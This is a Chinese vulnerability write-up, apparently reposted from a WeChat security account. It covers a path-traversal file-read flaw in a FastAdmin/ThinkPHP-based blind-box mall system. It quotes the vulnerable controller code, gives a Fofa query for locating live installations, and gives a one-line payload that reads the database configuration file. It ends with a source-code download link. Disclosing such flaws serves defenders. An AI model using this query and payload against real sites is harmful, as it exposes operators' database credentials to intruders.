某H5盲盒商城小程序系统存在文件读取漏洞

admin 2024年7月18日15:01:49评论55 views字数 1287阅读4分17秒阅读模式
.漏洞简介

H5盲盒商城小程序系统2024年最新盲盒商城完整运营源码/对接免签支付接口/带潮玩充值,发货流程,新手视频,上百种商品及视频搭建教程.

资产详情

Fofa:body="H5盲盒后台"

某H5盲盒商城小程序系统存在文件读取漏洞某H5盲盒商城小程序系统存在文件读取漏洞某H5盲盒商城小程序系统存在文件读取漏洞某H5盲盒商城小程序系统存在文件读取漏洞框架:ThinkPHP 5.0.24 Debug:False

某H5盲盒商城小程序系统存在文件读取漏洞
漏洞分析

某H5盲盒商城小程序系统存在文件读取漏洞

框架为fastadmin写的,fastadmin出了个任意文件读取的洞,直接就可以打,在/application/index/controller/Ajax.php 中,传入参数后进入到了loadlang()函数,我们追踪一下.

/** * Ajax异步请求接口 * @internal */class Ajax extends Frontend{  protected $noNeedLogin = ['lang'];  protected $noNeedRight = ['*'];  protected $layout = '';  /**     * 加载语言包     */  public function lang(){    header('Content-Type: application/javascript');    header("Cache-Control: public");    header("Pragma: cache");    $offset = 30 * 60 * 60 * 24; // 缓存一个月    header("Expires: " . gmdate("D, d M Y H:i:s", time() + $offset) . " GMT");    $controllername = input("controllername");    $this->loadlang($controllername);    //强制输出JSON Object    $result = jsonp(Lang::get(), 200, [], ['json_encode_param' => JSON_FORCE_OBJECT | JSON_UNESCAPED_UNICODE]);    return $result;  }

进入到了 /common/controller/Api.php 的loadlang中,直接调用Load函数包含../lang/xxx.php 文件

/*** 加载语言文件* @param string $name*/protected function loadlang($name){  $name =  Loader::parseName($name);  Lang::load(APP_PATH . $this->request->module() . '/lang/' . $this->request->langset() . '/' . str_replace('.', '/', $name) . '.php');}

所以我们只需要传入lang=../../application/database 即可跨目录读取数据库文件.

某H5盲盒商城小程序系统存在文件读取漏洞
漏洞复现

某H5盲盒商城小程序系统存在文件读取漏洞

Payload:

/index/ajax/lang?lang=../../application/database

某H5盲盒商城小程序系统存在文件读取漏洞

H5盲盒商城源码 获取

https://www.123pan.com/s/6kuLjv-hYZ3A.html 提取码:8777

 

原文始发于微信公众号(星悦安全):某H5盲盒商城小程序系统存在文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月18日15:01:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某H5盲盒商城小程序系统存在文件读取漏洞https://cn-sec.com/archives/2969506.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息